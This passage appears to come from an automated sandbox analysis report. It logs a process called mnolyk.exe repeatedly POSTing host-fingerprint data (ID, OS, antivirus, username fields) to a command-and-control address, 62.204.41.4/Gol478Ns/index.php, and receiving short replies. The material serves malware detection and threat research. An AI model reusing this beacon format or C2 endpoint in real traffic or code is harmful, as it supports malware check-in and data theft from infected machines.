                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:11.471474886 CET420INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          28192.168.2.64974662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:57.646912098 CET133OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:57.712091923 CET133INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          280192.168.2.65000362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:11.648731947 CET421OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:11.713573933 CET421INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          281192.168.2.65000462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:11.893867016 CET422OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:11.959650040 CET422INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          282192.168.2.65000562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:12.152879953 CET423OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:12.220577955 CET423INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          283192.168.2.65000662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:12.401268005 CET424OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:12.465497971 CET424INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          284192.168.2.65000762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:12.669390917 CET425OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:12.732749939 CET425INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          285192.168.2.65000862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:12.917279959 CET426OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:12.980612993 CET426INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          286192.168.2.65000962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:13.165565968 CET427OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:13.231556892 CET427INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          287192.168.2.65001062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:13.422324896 CET428OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:13.486661911 CET428INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          288192.168.2.65001162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:13.661822081 CET429OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:13.727159977 CET429INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          289192.168.2.65001262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:13.968224049 CET430OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:14.033350945 CET430INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          29192.168.2.64974762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:57.887103081 CET134OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:57.949150085 CET134INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          290192.168.2.65001362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:14.205368042 CET431OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:14.271131992 CET431INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          291192.168.2.65001462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:14.441730022 CET432OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:14.504437923 CET432INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          292192.168.2.65001562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:14.676485062 CET433OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:14.743518114 CET433INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          293192.168.2.65001662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:14.953403950 CET434OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:15.018220901 CET434INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          294192.168.2.65001762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:15.190910101 CET435OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:15.258924961 CET435INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          295192.168.2.65001862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:15.452445030 CET436OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:15.518418074 CET436INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          296192.168.2.65001962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:15.689584017 CET437OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:15.753391027 CET437INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          297192.168.2.65002062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:15.924236059 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:02:15.988842010 CET438INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:02:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          298192.168.2.65002162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:02:16.175025940 CET439OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
